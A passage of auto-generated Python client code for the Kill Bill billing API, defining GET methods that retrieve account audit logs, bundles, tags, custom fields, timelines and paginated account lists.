This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_audit_logs_with_history_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_audit_logs_with_history`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_bundles(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve bundles for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_bundles(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str external_key:
:param Str bundles_filter:
:param Str audit:
:return: List[Bundle]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_bundles_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_bundles_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_bundles_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve bundles for account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_bundles_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str external_key:
:param Str bundles_filter:
:param Str audit:
:return: List[Bundle]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'external_key', 'bundles_filter', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_bundles" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_bundles`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_bundles`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'bundles_filter' in params:
query_params.append(('bundlesFilter', params['bundles_filter'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/bundles', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Bundle]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_by_key(self, external_key=None, **kwargs): # noqa: E501
"""Retrieve an account by external key # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_by_key(external_key, async=True)
>>> result = thread.get()
:param async bool
:param Str external_key: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_by_key_with_http_info(external_key, **kwargs) # noqa: E501
else:
(data) = self.get_account_by_key_with_http_info(external_key, **kwargs) # noqa: E501
return data
def get_account_by_key_with_http_info(self, external_key=None, **kwargs): # noqa: E501
"""Retrieve an account by external key # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_by_key_with_http_info(external_key, async=True)
>>> result = thread.get()
:param async bool
:param Str external_key: (required)
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['external_key', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_by_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'external_key' is set
if ('external_key' not in params or
params['external_key'] is None):
raise ValueError("Missing the required parameter `external_key` when calling `get_account_by_key`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'external_key' in params:
query_params.append(('externalKey', params['external_key'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_custom_fields(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account custom fields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_custom_fields(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_custom_fields_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account custom fields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_custom_fields_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/customFields', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_email_audit_logs_with_history(self, account_id=None, account_email_id=None, **kwargs): # noqa: E501
"""Retrieve account email audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_email_audit_logs_with_history(account_id, account_email_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str account_email_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, **kwargs) # noqa: E501
return data
def get_account_email_audit_logs_with_history_with_http_info(self, account_id=None, account_email_id=None, **kwargs): # noqa: E501
"""Retrieve account email audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_email_audit_logs_with_history_with_http_info(account_id, account_email_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str account_email_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'account_email_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_email_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_email_audit_logs_with_history`") # noqa: E501
# verify the required parameter 'account_email_id' is set
if ('account_email_id' not in params or
params['account_email_id'] is None):
raise ValueError("Missing the required parameter `account_email_id` when calling `get_account_email_audit_logs_with_history`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_email_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
if 'account_email_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_email_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_email_id` when calling `get_account_email_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'account_email_id' in params:
path_params['accountEmailId'] = params['account_email_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails/{accountEmailId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AuditLog]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_tags(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_tags(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_tags_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_tags_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_tags_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_tags_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'included_deleted', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/tags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_account_timeline(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account timeline # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_timeline(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool parallel:
:param Str audit:
:return: AccountTimeline
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_account_timeline_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_account_timeline_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_account_timeline_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account timeline # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_account_timeline_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Bool parallel:
:param Str audit:
:return: AccountTimeline
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'parallel', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_timeline" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_account_timeline`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_account_timeline`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'parallel' in params:
query_params.append(('parallel', params['parallel'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/timeline', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountTimeline', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_accounts(self, **kwargs): # noqa: E501
"""List accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_accounts(async=True)
>>> result = thread.get()
:param async bool
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_accounts_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_accounts_with_http_info(**kwargs) # noqa: E501
return data
def get_accounts_with_http_info(self, **kwargs): # noqa: E501
"""List accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_accounts_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_accounts" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/pagination', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_custom_fields(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account customFields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_custom_fields(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_all_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_all_custom_fields_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_all_custom_fields_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account customFields # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_custom_fields_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Str audit:
:return: List[CustomField]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'object_type', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_custom_fields" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_all_custom_fields`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_all_custom_fields`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'object_type' in params:
query_params.append(('objectType', params['object_type'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/allCustomFields', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[CustomField]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_tags(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_tags(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_all_tags_with_http_info(account_id, **kwargs) # noqa: E501
else:
(data) = self.get_all_tags_with_http_info(account_id, **kwargs) # noqa: E501
return data
def get_all_tags_with_http_info(self, account_id=None, **kwargs): # noqa: E501
"""Retrieve account tags # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_all_tags_with_http_info(account_id, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str object_type:
:param Bool included_deleted:
:param Str audit:
:return: List[Tag]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'object_type', 'included_deleted', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_tags" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_all_tags`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `get_all_tags`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'object_type' in params:
query_params.append(('objectType', params['object_type'])) # noqa: E501
if 'included_deleted' in params:
query_params.append(('includedDeleted', params['included_deleted'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/allTags', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Tag]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_blocking_state_audit_logs_with_history(self, blocking_id=None, **kwargs): # noqa: E501
"""Retrieve blocking state audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_state_audit_logs_with_history(blocking_id, async=True)
>>> result = thread.get()
:param async bool
:param Str blocking_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, **kwargs) # noqa: E501
else:
(data) = self.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, **kwargs) # noqa: E501
return data
def get_blocking_state_audit_logs_with_history_with_http_info(self, blocking_id=None, **kwargs): # noqa: E501
"""Retrieve blocking state audit logs with history by id # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_blocking_state_audit_logs_with_history_with_http_info(blocking_id, async=True)
>>> result = thread.get()
:param async bool
:param Str blocking_id: (required)
:return: List[AuditLog]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['blocking_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_blocking_state_audit_logs_with_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'blocking_id' is set
if ('blocking_id' not in params or
params['blocking_id'] is None):
raise ValueError("Missing the required parameter `blocking_id` when calling `get_blocking_state_audit_logs_with_history`") # noqa: E501
if 'blocking_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['blocking_id']): # noqa: E501
raise ValueError("Invalid value for parameter `blocking_id` when calling `get_blocking_state_audit_logs_with_history`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'blocking_id' in params:
path_params['blockingId'] = params['blocking_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/block/{blockingId}/auditLogsWithHistory', 'GET',
path_params,
query_params,
header_params,
body=body_params,
